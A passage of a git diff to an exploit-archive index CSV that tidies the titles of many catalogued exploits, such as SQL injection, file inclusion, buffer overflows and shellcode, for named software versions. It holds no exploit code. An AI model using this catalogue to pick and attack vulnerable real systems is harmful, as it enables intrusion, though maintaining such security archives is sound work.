diff --git a/files.csv b/files.csv index 962345c71..f60607a87 100755 --- a/files.csv +++ b/files.csv @@ -1225,7 +1225,7 @@ id,file,description,date,author,platform,type,port 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)",2006-02-08,"H D Moore",osx,remote,0 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 -1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0 +1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 @@ -3094,7 +3094,7 @@ id,file,description,date,author,platform,type,port 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability",2007-03-07,Dj7xpl,php,webapps,0 3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,N/A,windows,local,0 -3430,platforms/windows/dos/3430.html,"Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption",2007-03-08,shinnai,windows,dos,0 +3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0 3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0 @@ -3818,7 +3818,7 @@ id,file,description,date,author,platform,type,port 4170,platforms/windows/remote/4170.html,"Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 4171,platforms/php/webapps/4171.pl,"Mail Machine <= 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC",2007-07-10,dreyer,linux,local,0 -4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0 +4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability",2007-07-12,irk4z,php,webapps,0 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0 4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit",2007-07-12,callAX,windows,remote,0 @@ -5047,7 +5047,7 @@ id,file,description,date,author,platform,type,port 5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0 5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 -5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 +5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure Vulnerability",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0 @@ -8414,7 +8414,7 @@ id,file,description,date,author,platform,type,port 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0 8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0 8921,platforms/php/webapps/8921.sh,"phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0 -8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0 +8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion Vulnerability",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln",2009-06-10,N@bilX,php,webapps,0 @@ -8456,7 +8456,7 @@ id,file,description,date,author,platform,type,port 8962,platforms/php/webapps/8962.txt,"phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln",2009-06-15,SirGod,php,webapps,0 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass Vulnerability",2009-06-15,"Tom Neaves",hardware,remote,0 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0 -8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player Add-On HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0 +8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0 8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0 @@ -12475,7 +12475,7 @@ id,file,description,date,author,platform,type,port 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 -14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0 +14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability",2010-07-03,RoAd_KiLlEr,php,webapps,0 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 @@ -16402,7 +16402,7 @@ id,file,description,date,author,platform,type,port 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0 -18974,platforms/php/webapps/18974.txt,"vanilla forum tagging plug-in enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 +18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 @@ -19395,11 +19395,11 @@ id,file,description,date,author,platform,type,port 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 Session Manager SysLog Format String Vulnerability",2003-01-07,"dong-h0un yoU",linux,remote,0 22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 Dot-Dot-Slash Directory Traversal Vulnerability",2003-01-07,"Dennis Rand",windows,remote,0 22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone Cross-Site Scripting Vulnerability",2003-01-09,"Rynho Zeros Web",cgi,webapps,0 -22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plug-in CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0 -22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0 -22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plug-in MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0 -22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0 -22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0 +22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0 +22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0 +22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0 +22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0 +22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0 22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness",2003-01-10,euronymous,linux,remote,0 22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 Relative Path Directory Traversal Vulnerability",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0 22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 Daemon Mode Remote Command Execution Vulnerability",2003-01-11,"Maurycy Prodeus ",multiple,remote,0 @@ -20176,10 +20176,10 @@ id,file,description,date,author,platform,type,port 22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting Vulnerability",2003-07-28,"Bahaa Naamneh",cgi,webapps,0 22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String Vulnerability",2003-07-28,lucipher,unix,remote,0 22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow Vulnerability",2003-07-28,c0wboy,linux,local,0 -22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0 +22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0 22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0 -22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0 +22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0 22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 & 3.1.1.1c1 &4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0 22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability",2003-08-11,aT4r@3wdesign.es,windows,remote,0 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0 @@ -20424,7 +20424,7 @@ id,file,description,date,author,platform,type,port 23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 MSG Cross-Site Scripting Vulnerability",2003-09-29,G00db0y,asp,webapps,0 23196,platforms/linux/remote/23196.c,"WebFS 1.x Long Pathname Buffer Overrun Vulnerability",2003-09-29,jsk,linux,remote,0 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 MJ-Player Server Flag Local Buffer Overflow Vulnerability",2003-09-29,jsk,linux,local,0 -23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0 +23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0 23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash PoC",2012-12-07,coolkaveh,windows,dos,0 @@ -20491,12 +20491,12 @@ id,file,description,date,author,platform,type,port 23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0 23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF Malformed Server Name Heap Corruption Vulnerability",2003-10-20,@stake,multiple,dos,0 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection Vulnerabilities",2003-10-20,"Aviram Jenik",php,webapps,0 -23265,platforms/windows/remote/23265.txt,"Sun Java Plug-In 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0 +23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart Server Error Message Installation Path Disclosure Vulnerability",2003-10-20,Dr`Ponidi,cgi,webapps,0 23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 IMAP AUTH Remote Buffer Overflow Vulnerability",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0 23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting Vulnerability",2003-10-21,ComSec,java,webapps,0 23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 MyClassifieds Email Variable SQL Injection Vulnerability",2003-10-21,Ezhilan,php,webapps,0 -23270,platforms/windows/remote/23270.java,"Sun Java Plug-In 1.4 Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0 +23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0 23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting Vulnerability",2003-10-22,SecuriTeam,multiple,remote,0 23272,platforms/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability",2003-10-22,"Jon Hart",solaris,remote,0 23273,platforms/windows/dos/23273.html,"Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability",2003-10-22,"Andreas Boeckler",windows,dos,0 @@ -20504,7 +20504,7 @@ id,file,description,date,author,platform,type,port 23275,platforms/cgi/webapps/23275.txt,"DansGuardian 2.2.x Denied URL Cross-Site Scripting Vulnerability",2003-10-22,"Richard Maudsley",cgi,webapps,0 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability",2003-10-22,"Last Stage of Delirium",multiple,dos,0 23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0 -23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0 +23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 @@ -21114,7 +21114,7 @@ id,file,description,date,author,platform,type,port 23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal Vulnerability",2004-04-05,dr_insane,windows,remote,0 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation Vulnerability",2004-04-06,"Ian Vitek",windows,local,0 23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 -23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 +23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23913,platforms/cgi/webapps/23913.txt,"Floosietek FTGate Mail Server 1.2 index.fts folder Parameter XSS",2004-04-06,dr_insane,cgi,webapps,0 23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 Path Disclosure Vulnerability",2004-04-06,dr_insane,cgi,webapps,0 23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 COM Objects Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21193,7 +21193,7 @@ id,file,description,date,author,platform,type,port 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0 -23993,platforms/php/webapps/23993.txt,"websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 +23993,platforms/php/webapps/23993.txt,"Websitebaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0 @@ -21576,7 +21576,7 @@ id,file,description,date,author,platform,type,port 24385,platforms/asp/webapps/24385.txt,"Zixforum ZixForum.mdb Database Disclosure Vulnerability",2004-07-19,"Security .Net Information",asp,webapps,0 24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow Vulnerability",2004-07-20,"Matthias Bethke",multiple,dos,0 24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability",2004-08-20,"Audun Larsen",multiple,remote,0 -24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0 +24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0 24389,platforms/php/webapps/24389.txt,"Sympa 4.x New List HTML Injection Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24390,platforms/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0 @@ -21922,7 +21922,7 @@ id,file,description,date,author,platform,type,port 24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router HTTP Remote Administration Configuration Reset Vulnerability",2004-11-22,"Francisco Canela",hardware,remote,0 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x Client Remote Denial of Service Vulnerability",2004-11-22,"Luigi Auriemma",multiple,dos,0 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 -24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plug-in JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0 +24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0 24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0 24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x Submit Link Function HTML Injection Vulnerability",2004-11-23,XioNoX,php,webapps,0 24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow Vulnerability",2004-11-23,"Luigi Auriemma",windows,remote,0 @@ -22855,7 +22855,7 @@ id,file,description,date,author,platform,type,port 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability",2005-05-26,"Eric Romang",linux,local,0 -25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plug-in Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0 +25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0 25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service Vulnerability",2005-05-26,"Marek Bialoglowy",hardware,dos,0 25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE",2013-05-26,rgod,windows,dos,0 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0 @@ -23097,7 +23097,7 @@ id,file,description,date,author,platform,type,port 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0 -25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0 +25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0 25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0 25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution Vulnerability",2005-07-07,blahplok,cgi,webapps,0 25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 @@ -25693,7 +25693,7 @@ id,file,description,date,author,platform,type,port 28636,platforms/php/webapps/28636.txt,"Grayscale BandSite CMS 1.1 shows_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28637,platforms/php/webapps/28637.txt,"Grayscale BandSite CMS 1.1 signgbook_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0 -28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 Plug-In Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0 +28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Web Server Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0 28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 @@ -27154,7 +27154,7 @@ id,file,description,date,author,platform,type,port 30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 